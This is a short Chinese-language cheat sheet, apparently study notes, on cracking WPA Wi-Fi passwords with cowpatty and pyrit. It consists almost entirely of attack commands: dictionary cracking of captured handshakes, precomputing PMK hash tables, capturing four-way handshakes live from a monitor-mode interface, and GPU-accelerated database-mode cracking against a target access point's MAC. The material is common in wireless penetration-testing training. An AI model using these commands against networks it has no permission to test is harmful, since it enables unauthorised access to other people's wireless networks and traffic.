如果想深入学习无线安全,可以参考评论区第一条
COWPATTY破解密码
- WPA密码通用破解工具
- 使用密码字段
- cowpatty -r [.CAP包] -f [字典] -s [ssid]
- 使用彩虹表(PMK)
genpmk -f 【字典】 -d pmkhash -s [ssid]
cowpatty -r [.cap包] -d pmkhash -s [ssid]
PYRIT破解密码
- 与airolib、cowpatty相同,支持基于预计算的PMK提高破解速度
- 独有的优势
- 除CPU之外pyrit可以运用GPU的强大运算能力加速生成PMK
- 本身支持抓包获取四步握手过程,无需用Airodump抓包
- 也支持传统的读取airodump抓包获取四部握手的方式
- 只抓取WAP四次握手过程包
- pyrit -r wlan0mon -o wpapyrit.wap stripLive
- pyrit -r wpapyrit.cap analyze #分析抓下来的包
- 从airodump抓包导入并筛选
- pyrit -r wap.cap -o wpapyrit.cap strip
pyrit -r wpapyrit.cap -i password.ist -b <AP mac> attack passthrough
- 数据库模式破解
- 默认使用基于文件的数据库,支持连接SQL数据库,将计算的PMK存储数据库
- 查看默认数据库状态:pyrit eval
- 导入密码字典:pyrit -i password.lst import passwords (剔除了不合规的密码)
- 指定ESSID:pyrit -e [无线名称] create essid
- 计算PMK:pyrit batch(发挥GPU计算能力)
- 破解密码:pyrit -r wpapyrit.cap -b <AP MAC> attack db
